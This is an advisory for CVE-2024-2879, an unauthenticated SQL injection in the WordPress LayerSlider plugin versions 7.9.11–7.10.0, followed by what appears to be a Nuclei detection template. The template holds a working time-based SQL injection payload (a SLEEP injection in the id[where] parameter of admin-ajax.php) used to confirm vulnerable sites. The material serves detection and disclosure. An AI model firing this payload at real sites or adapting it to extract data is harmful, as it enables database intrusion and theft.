The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
PoC代码[已公开]
id: CVE-2024-2879
info:
name: WordPress Plugin LayerSlider 7.9.11-7.10.0 - SQL Injection
author: d4ly
severity: high
description: |
The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
remediation: Fixed in 7.10.1
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-2879
- https://www.securityblue.team/blog/posts/Critical-Vulnerability-in-WordPress-Plugin-LayerSlider
- https://www.wordfence.com/blog/2024/04/5500-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-layerslider-wordpress-plugin/
- https://layerslider.com/release-log/
- https://www.wordfence.com/threat-intel/vulnerabilities/id/3fddf96e-029c-4753-ba82-043ca64b78d3?source=cve
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-2879
cwe-id: CWE-89
epss-score: 0.93316
epss-percentile: 0.99806
cpe: cpe:2.3:a:layerslider:layerslider:7.9.11:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: layerslider
product: layerslider
framework: wordpress
publicwww-query: "/wp-content/plugins/LayerSlider/"
tags: time-based-sqli,cve,cve2024,wp-plugin,wp,wordpress,layerslider,sqli
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/LayerSlider/assets/static/public/front.css"
matchers:
- type: word
internal: true
words:
- ".ls-clearfix:before"
- raw:
- |
@timeout: 10s
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))x)--+x) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- duration>=6
- status_code == 200
- contains(body, "<script>")
condition: and
# digest: 4a0a004730450221008d2d64bfd24ddf1bfcaa2abcefbffc965e9e88ec60d3d69331838682772af854022050a077c5a2e1936c23a387df5a083cf8e684dac99461b7500e0ff4507be10710:922c64590222798bb761d5b6d8e72950